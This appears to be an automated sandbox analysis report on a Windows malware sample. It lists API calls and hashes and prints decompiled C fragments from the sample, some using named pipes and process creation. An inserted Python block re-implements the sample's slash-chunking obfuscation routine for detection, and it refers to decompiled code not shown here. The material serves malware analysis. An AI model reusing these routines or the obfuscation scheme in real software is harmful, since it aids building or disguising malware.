                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memcpy$AllocateHeaplstrlen
                              • String ID:
                              • API String ID: 1819133394-0
                              • Opcode ID: e2031716f9926a535c344d1d30f074eca041f53ba78f4ddd16eb97af6263cf9a
                              • Instruction ID: b819a7ab5112829321ffff036bf3e49fdc8c950d825823cc5f904bd67d3274ae
                              • Opcode Fuzzy Hash: e2031716f9926a535c344d1d30f074eca041f53ba78f4ddd16eb97af6263cf9a
                              • Instruction Fuzzy Hash: AD11E572A05154BFD7108FA9EC84D9EBFFEDBC0290B154276F505D7250EA74AE44C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%
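                              The decompiled E049D484D above is compact enough to re-implement, which is useful when a captured string has to be matched against what the sample would produce. The following Python is an added example written for this report; it is not code from the sample or from the sandbox. The LCG constants, the 8..24 window and the '/' separator are read directly off the decompiled C; the starting seed 0xEBF23B00 is the value the decompiler annotated at 0x49dd288; the sample input is constructed here; and the reading of the routine as a request-path obfuscator is an assumption, not something the report states. The decompiled loop has no guard for inputs of 8 bytes or fewer (at exactly 8 the modulus becomes zero), so the re-implementation returns such inputs unchanged.

```python
# Added example: Python re-implementation of the chunking loop decompiled as
# E049D484D. Not code from the sample or from the report; the purpose of the
# routine (obfuscating a request path) is an assumption.

MUL = 0x19660D        # LCG multiplier, from the decompiled code
INC = 0x3C6EF35F      # LCG increment, from the decompiled code
MASK32 = 0xFFFFFFFF
MIN_CHUNK = 8         # the "+ 8" in the decompiled length computation
MAX_WINDOW = 0x18     # the 0x18 cap on the window (24 bytes)


def lcg_step(seed: int) -> int:
    """One step of the 32-bit LCG: seed * 0x19660D + 0x3C6EF35F (mod 2**32)."""
    return (seed * MUL + INC) & MASK32


def chunk_length(seed: int, remaining: int) -> int:
    """Chunk length exactly as decompiled: (seed & 0xffff) % (window - 8) + 8,
    with window = min(24, remaining). Only meaningful for remaining > 8; the
    decompiled code has no guard and would divide by zero at remaining == 8."""
    window = min(MAX_WINDOW, remaining)
    return (seed & 0xFFFF) % (window - MIN_CHUNK) + MIN_CHUNK


def slash_chunk(data: bytes, seed: int) -> tuple:
    """Copy data into a new buffer, inserting '/' after every chunk of 8..23 bytes.

    Returns (output, updated_seed). Mirrors the do/while loop in E049D484D:
    the body runs while more than 8 bytes remain, then the tail (1..8 bytes)
    is copied verbatim. Inputs of 8 bytes or fewer are returned unchanged,
    a guard the decompiled routine does not have.
    """
    if b"/" in data:
        raise ValueError("input already contains '/', unchunk() would be ambiguous")
    remaining = len(data)
    if remaining <= MIN_CHUNK:
        return data, seed
    out = bytearray()
    pos = 0
    while remaining > MIN_CHUNK:
        seed = lcg_step(seed)                # the global state at 0x49dd288 in the sample
        n = chunk_length(seed, remaining)
        out += data[pos:pos + n]
        out += b"/"                          # the  *_t27 = 0x2f  store
        pos += n
        remaining -= n
    out += data[pos:]                        # final memcpy of the remaining bytes
    return bytes(out), seed


def unchunk(obfuscated: bytes) -> bytes:
    """Reverse the transform: the only bytes the routine adds are '/' separators."""
    return obfuscated.replace(b"/", b"")


def chunk_lengths(obfuscated: bytes) -> list:
    """Lengths of the '/'-separated pieces, for inspecting a captured string."""
    return [len(p) for p in obfuscated.split(b"/")]


if __name__ == "__main__":
    # Constructed input: 40 distinct bytes, starting from the seed value the
    # decompiler annotated at 0x49dd288 (0xebf23b00).
    sample = bytes(range(0x41, 0x41 + 40))
    out, _ = slash_chunk(sample, 0xEBF23B00)
    print(out.decode(), chunk_lengths(out))
```

Because the state is updated on every chunk, reproducing a captured string requires the seed the sample had at that moment; without it, the useful checks are structural: every piece before the last is 8 to 23 bytes long, the last piece is 1 to 8 bytes, and removing the separators gives back the original data. That is a weak heuristic on its own and should be combined with the other indicators in this report rather than used as a signature.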

                              APIs
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,053CC682,00000000,00000000), ref: 053D156A
                              • GetLastError.KERNEL32(?,?,?,053CC682,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,053C187D,?,0000001E), ref: 053D1572
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ByteCharErrorLastMultiWide
                              • String ID:
                              • API String ID: 203985260-0
                              • Opcode ID: e3a6239d3b13b9d36da525c3e1ff8a4b7a6449ed20cb2fca922340fd365f00c7
                              • Instruction ID: 3348f10e21bdada7c6af3a0690b52fbd46639b33da5c827764d27fe6c57ab014
                              • Opcode Fuzzy Hash: e3a6239d3b13b9d36da525c3e1ff8a4b7a6449ed20cb2fca922340fd365f00c7
                              • Instruction Fuzzy Hash: CA018477108251BF87319E66AC4CD2BFFFEFBC67A0B100B19F86296280DA249904C671
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(?), ref: 053D95B2
                              • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 053D95D8
                              • lstrcpy.KERNEL32(00000014,?), ref: 053D95FD
                              • memcpy.NTDLL(?,?,?), ref: 053D960A
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrcpylstrlenmemcpy
                              • String ID:
                              • API String ID: 1388643974-0
                              • Opcode ID: 00ac7656003e7552fb536b6a412a3d80b0f20d217f88b333c9ac5f78dc5ab160
                              • Instruction ID: 676a8a9fc700a2c7745d87b2eeac00415a18e4fecbeff96b78f62dd503165954
                              • Opcode Fuzzy Hash: 00ac7656003e7552fb536b6a412a3d80b0f20d217f88b333c9ac5f78dc5ab160
                              • Instruction Fuzzy Hash: 6D115B7291060AEFCB21CF58E884E9ABBF9FF48714F10855DF8468B250D775E904DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 053D45E8
                              • lstrlen.KERNEL32(064FBF48), ref: 053D4609
                              • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 053D4621
                              • lstrcpy.KERNEL32(00000000,064FBF48), ref: 053D4633
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                              • String ID:
                              • API String ID: 1929783139-0
                              • Opcode ID: 08b7614d76697a0fc08447c7d1f093fb263b8040d23dd77d4e52dd7920ddaa35
                              • Instruction ID: a972843697d9e29d9691ab571ad78acdcf7121a7350f2736a2224323930fa16c
                              • Opcode Fuzzy Hash: 08b7614d76697a0fc08447c7d1f093fb263b8040d23dd77d4e52dd7920ddaa35
                              • Instruction Fuzzy Hash: 8001A576504204ABC7219FADA889A5ABFFCAB49201F144068F94BDB241DA709A09C770
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • RtlInitializeCriticalSection.NTDLL(053F0460), ref: 053E45F2
                              • RtlInitializeCriticalSection.NTDLL(053F0440), ref: 053E4608
                              • GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E4619
                              • GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053E464D
                                • Part of subcall function 053DEFDA: GetModuleHandleA.KERNEL32(?,00000001,77E49EB0,00000000,?,?,00000000,053E4630,?,00000000), ref: 053DEFF2
                                • Part of subcall function 053DEFDA: LoadLibraryA.KERNEL32(?), ref: 053DF093
                                • Part of subcall function 053DEFDA: FreeLibrary.KERNEL32(00000000), ref: 053DF09E
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                              • String ID:
                              • API String ID: 1711133254-0
                              • Opcode ID: 5945cae576678431af186ef6bd5e0abee8af76a3c6816f5220870e272e66648b
                              • Instruction ID: 23b520bba2f6760a5665deaf507f788a4bd9f78007170d3edb27dc81ab415498
                              • Opcode Fuzzy Hash: 5945cae576678431af186ef6bd5e0abee8af76a3c6816f5220870e272e66648b
                              • Instruction Fuzzy Hash: 1A117C76A602109BDB589FACA98E5197FECB749304F40442AF116CB282DEB468508F60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D3763: lstrlen.KERNEL32(00000000,00000000,00000000,053DFD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 053D3768
                                • Part of subcall function 053D3763: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 053D377D
                                • Part of subcall function 053D3763: wsprintfA.USER32 ref: 053D3799
                                • Part of subcall function 053D3763: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 053D37B5
                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 053DD472
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 053DD481
                              • CloseHandle.KERNEL32(00000000), ref: 053DD48B
                              • GetLastError.KERNEL32 ref: 053DD493
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                              • String ID:
                              • API String ID: 4042893638-0
                              • Opcode ID: 35adbb277e6d7edb49c56cf695809075bdb3304926e7af5c678dd978bba1eb03
                              • Instruction ID: a8e85532d63cc1330aa09865aac3634d15b215f7a644d1ca965a9e2986c012ea
                              • Opcode Fuzzy Hash: 35adbb277e6d7edb49c56cf695809075bdb3304926e7af5c678dd978bba1eb03
                              • Instruction Fuzzy Hash: 2BF0D1722042147AD6326A65EC8DEAFBFBDEB41760F108819F90A9D0C0CE746A5082B0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,053F0244,00000001), ref: 053CE545
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053CE590
                                • Part of subcall function 053C3475: CreateThread.KERNEL32(00000000,00000000,00000000,?,053F01F8,053C10B6), ref: 053C348C
                                • Part of subcall function 053C3475: QueueUserAPC.KERNEL32(?,00000000,?), ref: 053C34A1
                                • Part of subcall function 053C3475: GetLastError.KERNEL32(00000000), ref: 053C34AC
                                • Part of subcall function 053C3475: TerminateThread.KERNEL32(00000000,00000000), ref: 053C34B6
                                • Part of subcall function 053C3475: CloseHandle.KERNEL32(00000000), ref: 053C34BD
                                • Part of subcall function 053C3475: SetLastError.KERNEL32(00000000), ref: 053C34C6
                              • GetLastError.KERNEL32(Function_00012AB7,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?), ref: 053CE578
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,053D940A,?,?,?), ref: 053CE588
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                              • String ID:
                              • API String ID: 1700061692-0
                              • Opcode ID: 09ad526e8ffa6f6be8f1a61609a4fe913d03cde592a3cbdd104f79a14c1cabfc
                              • Instruction ID: 8159f43e8899b09d134ceebcd37cd00ab9b0b236353cc952d456381fbf47ac76
                              • Opcode Fuzzy Hash: 09ad526e8ffa6f6be8f1a61609a4fe913d03cde592a3cbdd104f79a14c1cabfc
                              • Instruction Fuzzy Hash: B9F0ADB53042106FE3265A689C4DA6A2FACEB89331F000568F616CA2C0DA744C059760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrcatW.KERNEL32(00000000,00001000), ref: 053D3EF9
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                                • Part of subcall function 053C6D99: GetLastError.KERNEL32 ref: 053C6DE4
                                • Part of subcall function 053C6D99: WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                                • Part of subcall function 053C6D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                                • Part of subcall function 053C6D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                                • Part of subcall function 053C6D99: SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                                • Part of subcall function 053C6D99: CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              • WaitForSingleObject.KERNEL32(00002710,00000000,00000000,?,00000005,?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F1C
                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F3E
                              • GetLastError.KERNEL32(?,053DE92E,?,00000000,00001000,00000000,00000000,00001000), ref: 053D3F52
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                              • String ID:
                              • API String ID: 3370347312-0
                              • Opcode ID: ee71037618bb2f4b02b9966742725f9ec8507853af3acf1a39e73bf830342970
                              • Instruction ID: 6de3846aa8a1aaba2f4e2348100ddd3a3eda512f9b7ee1cd30d7f9b553c7e12e
                              • Opcode Fuzzy Hash: ee71037618bb2f4b02b9966742725f9ec8507853af3acf1a39e73bf830342970
                              • Instruction Fuzzy Hash: 3FF01932244209BBDB225E60EC0EFAABF7EBF05711F104514F61A9C0D0DBB599219B7A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,053C556D,000000FF,064FB7F0,?,?,053D652C,0000003A,064FB7F0), ref: 053CCFA6
                              • GetLastError.KERNEL32(?,?,053D652C,0000003A,064FB7F0,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053CCFB1
                              • WaitNamedPipeA.KERNEL32(00002710), ref: 053CCFD3
                              • WaitForSingleObject.KERNEL32(00000000,?,?,053D652C,0000003A,064FB7F0,?,?,?,053CFFEA,00000001,00000001,064F8578), ref: 053CCFE1
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Wait$CreateErrorFileLastNamedObjectPipeSingle
                              • String ID:
                              • API String ID: 4211439915-0
                              • Opcode ID: b973d8925489a91d47d78a8033ec7244bea4deaebfe827f76155e5d285909263
                              • Instruction ID: 7d8bbe1e7d2a5783295c78b68b579c5a5d7334c9593c0ca580a7f321d4cdf5d4
                              • Opcode Fuzzy Hash: b973d8925489a91d47d78a8033ec7244bea4deaebfe827f76155e5d285909263
                              • Instruction Fuzzy Hash: 81F09032604124ABE2311B69AC4EF9A7F9AFB043B1F110565F62EEE1D0CA714C50C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,053DFD57,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 053D3768
                              • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 053D377D
                              • wsprintfA.USER32 ref: 053D3799
                                • Part of subcall function 053E339E: memset.NTDLL ref: 053E33B3
                                • Part of subcall function 053E339E: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000020,00000000), ref: 053E33EC
                                • Part of subcall function 053E339E: wcstombs.NTDLL ref: 053E33F6
                                • Part of subcall function 053E339E: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000020,00000000), ref: 053E3427
                                • Part of subcall function 053E339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,053CDC52), ref: 053E3453
                                • Part of subcall function 053E339E: TerminateProcess.KERNEL32(?,000003E5), ref: 053E3469
                                • Part of subcall function 053E339E: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,053CDC52), ref: 053E347D
                                • Part of subcall function 053E339E: CloseHandle.KERNEL32(?), ref: 053E34B0
                                • Part of subcall function 053E339E: CloseHandle.KERNEL32(?), ref: 053E34B5
                              • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 053D37B5
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                              • String ID:
                              • API String ID: 1624158581-0
                              • Opcode ID: 19e10884ca5c9da042ac274733b696b753008c1375536f01b8e97b26f9d93463
                              • Instruction ID: 45dbb592414a68c8e3fb1a892497514c3038f12ac745cb70a158865cd2194e77
                              • Opcode Fuzzy Hash: 19e10884ca5c9da042ac274733b696b753008c1375536f01b8e97b26f9d93463
                              • Instruction Fuzzy Hash: 5EF09AB2210114ABD262172DBC0EF6B7FBEEBC1B24F050121F902DE2D1DE609D0587B1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlEnterCriticalSection.NTDLL(064FC0A0), ref: 053D9FD4
                              • Sleep.KERNEL32(0000000A,?,053D94CE,00000000,00000000,053C4FAB,?,00000000), ref: 053D9FDE
                              • HeapFree.KERNEL32(00000000,?,?,053D94CE,00000000,00000000,053C4FAB,?,00000000), ref: 053DA006
                              • RtlLeaveCriticalSection.NTDLL(064FC0A0), ref: 053DA024
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                              • String ID:
                              • API String ID: 58946197-0
                              • Opcode ID: 9cd939e7f4aa8a8e8d5a2079080c66196717de72b5250fc9ad6f8f57f4a949ee
                              • Instruction ID: d60c2015202edab6b6936968ba575cb4b1829189f2e4c3fc357ca57b0a862b31
                              • Opcode Fuzzy Hash: 9cd939e7f4aa8a8e8d5a2079080c66196717de72b5250fc9ad6f8f57f4a949ee
                              • Instruction Fuzzy Hash: 07F03A722602019FD725DF68ED4EF16BFFDEB00302F008405B546DE292CA70D814DB25
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D5C2B() {
                              				void* _t1;
                              				intOrPtr _t5;
                              				void* _t6;
                              				void* _t7;
                              				void* _t11;
                              
                              				_t1 =  *0x49dd2a4; // 0x2e0
                              				if(_t1 == 0) {
                              					L8:
                              					return 0;
                              				}
                              				SetEvent(_t1);
                              				_t11 = 0x7fffffff;
                              				while(1) {
                              					SleepEx(0x64, 1);
                              					_t5 =  *0x49dd2f4; // 0x0
                              					if(_t5 == 0) {
                              						break;
                              					}
                              					_t11 = _t11 - 0x64;
                              					if(_t11 > 0) {
                              						continue;
                              					}
                              					break;
                              				}
                              				_t6 =  *0x49dd2a4; // 0x2e0
                              				if(_t6 != 0) {
                              					CloseHandle(_t6);
                              				}
                              				_t7 =  *0x49dd270; // 0x5420000
                              				if(_t7 != 0) {
                              					HeapDestroy(_t7);
                              				}
                              				goto L8;
                              			}

                              APIs
                              • SetEvent.KERNEL32(000002E0,00000001,049D4170), ref: 049D5C36
                              • SleepEx.KERNEL32(00000064,00000001), ref: 049D5C45
                              • CloseHandle.KERNEL32(000002E0), ref: 049D5C66
                              • HeapDestroy.KERNEL32(05420000), ref: 049D5C76
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
• Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: CloseDestroyEventHandleHeapSleep
                              • String ID:
                              • API String ID: 4109453060-0
                              • Opcode ID: 2c0289130b092f94633158ea93272af4631b4f4f0780b0e10ede671ffecf8c72
                              • Instruction ID: 2efa4975674a04512912207c8b747476aba514df95e6e6371e6f7a672eb2f177
                              • Opcode Fuzzy Hash: 2c0289130b092f94633158ea93272af4631b4f4f0780b0e10ede671ffecf8c72
                              • Instruction Fuzzy Hash: CEF01C7570A212ABEB206E75D94CB063EECEB147617064634FA45E7180CA28EC81C660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E049D3A79(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                              				struct _FILETIME _v12;
                              				void* _t11;
                              				void* _t20;
                              				void* _t22;
                              				void* _t23;
                              				signed short* _t24;
                              
                              				_t22 = __edx;
                              				_t23 = E049D65F6(_t11, _a12);
                              				if(_t23 == 0) {
                              					_t20 = 8;
                              				} else {
                              					_t24 = _t23 + _a16 * 2;
                              					 *_t24 =  *_t24 & 0x00000000;
                              					_t20 = E049D6B4F(__ecx, _a4, _a8, _t23);
                              					if(_t20 == 0) {
                              						GetSystemTimeAsFileTime( &_v12);
                              						 *_t24 = 0x5f;
                              						_t20 = E049D6E41(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
                              					}
                              					HeapFree( *0x49dd270, 0, _t23);
                              				}
                              				return _t20;
                              			}

                              APIs
                                • Part of subcall function 049D65F6: lstrlen.KERNEL32(?,00000000,05819B78,00000000,049D25B8,05819D56,69B25F44,?,?,?,?,69B25F44,00000005,049DD00C,4D283A53,?), ref: 049D65FD
                                • Part of subcall function 049D65F6: mbstowcs.NTDLL ref: 049D6626
                                • Part of subcall function 049D65F6: memset.NTDLL ref: 049D6638
                              • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,058193AC), ref: 049D3AB0
                              • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74785520,00000008,00000014,004F0053,058193AC), ref: 049D3ADD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
• Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
• Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
• Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
• Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                              • String ID: Uxt
                              • API String ID: 1500278894-1536154274
                              • Opcode ID: 26fc1cd96a0d94e5aef01d17cc02d8c7b87ec65b02e074c9f493f45a270d4f5d
                              • Instruction ID: 348517db89e8067898800a130a003e7c3ec97ad37a69c88acd79afa94d9e77ac
                              • Opcode Fuzzy Hash: 26fc1cd96a0d94e5aef01d17cc02d8c7b87ec65b02e074c9f493f45a270d4f5d
                              • Instruction Fuzzy Hash: 92012832204209BBEF216F98DC44E9B7FBDEB84714F008035FE44AA150EB71E968D761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,?,?), ref: 053D2F4D
                              • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 053D2F5F
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memcpy
                              • String ID: 0x
                              • API String ID: 3510742995-3225541890
                              • Opcode ID: 975ba20c25a70357f9e1009cf18dd8b4ef84759b7f3b92eb78dfac63a78d9f3a
                              • Instruction ID: 1b59925cd4bc7e65f6423ffb409f3755ca905b310ee8db166f53ee92ba7a453d
                              • Opcode Fuzzy Hash: 975ba20c25a70357f9e1009cf18dd8b4ef84759b7f3b92eb78dfac63a78d9f3a
                              • Instruction Fuzzy Hash: 91015E3AA10119ABDB11DAA8D8059AFFBBDFB44344F104515F904E7140EBB09A09C7A1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D3D4D: lstrlen.KERNEL32(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DA6
                                • Part of subcall function 053D3D4D: lstrlen.KERNEL32(?,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3DC4
                                • Part of subcall function 053D3D4D: RtlAllocateHeap.NTDLL(00000000,74786985,?), ref: 053D3DED
                                • Part of subcall function 053D3D4D: memcpy.NTDLL(00000000,00000000,00000000,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E04
                                • Part of subcall function 053D3D4D: HeapFree.KERNEL32(00000000,00000000), ref: 053D3E17
                                • Part of subcall function 053D3D4D: memcpy.NTDLL(00000000,?,?,?,77E34620,?,?,?,?,053C576D,?,?,?,?,?), ref: 053D3E26
                              • GetLastError.KERNEL32 ref: 053C94E8
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA2EC
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA310
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,053F01F4,?,?,053C121E,?,00000000,?,?), ref: 053CA31E
                              • HeapFree.KERNEL32(00000000,?), ref: 053C9504
                              • HeapFree.KERNEL32(00000000,?), ref: 053C9515
                              • SetLastError.KERNEL32(00000000), ref: 053C9518
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                              • String ID:
                              • API String ID: 2451549186-0
                              • Opcode ID: 3bcd91d57a738340d0b34d0d07b2542211db1dcfc52b46d720a9a0cd8b36588b
                              • Instruction ID: 7dcaaaac9a8035c9c55ab0e5a87f282a7e24e9d6c158129de55bc75e3ca719b2
                              • Opcode Fuzzy Hash: 3bcd91d57a738340d0b34d0d07b2542211db1dcfc52b46d720a9a0cd8b36588b
                              • Instruction Fuzzy Hash: 65314A36900108EFCF129FA9DC4589EBFBAFF44310F12419AF916A6261C7719E61DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053C570C: lstrlenW.KERNEL32(?), ref: 053C5730
                                • Part of subcall function 053C570C: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 053C5742
                                • Part of subcall function 053C570C: wcstombs.NTDLL ref: 053C5750
                                • Part of subcall function 053C570C: lstrlen.KERNEL32(00000000,?,?,?,?,?), ref: 053C5774
                                • Part of subcall function 053C570C: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 053C5789
                                • Part of subcall function 053C570C: mbstowcs.NTDLL ref: 053C5796
                                • Part of subcall function 053C570C: HeapFree.KERNEL32(00000000,00000000), ref: 053C57A8
                                • Part of subcall function 053C570C: HeapFree.KERNEL32(00000000,00000000,?,?), ref: 053C57C2
                              • GetLastError.KERNEL32 ref: 053DED33
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA2EC
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 053CA310
                                • Part of subcall function 053CA23E: HeapFree.KERNEL32(00000000,00000000,?,00000000,053F01F4,?,?,053C121E,?,00000000,?,?), ref: 053CA31E
                              • HeapFree.KERNEL32(00000000,?), ref: 053DED4F
                              • HeapFree.KERNEL32(00000000,?), ref: 053DED60
                              • SetLastError.KERNEL32(00000000), ref: 053DED63
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 3867366388-0
                              • Opcode ID: ec8f057af93b5217fa29db80c886d99d617e1ba591527655807e0cb832d26c6c
                              • Instruction ID: 2f0bf462bcfa1017b9ded17a3108a420393200ef037e3117c14af5be83040b4c
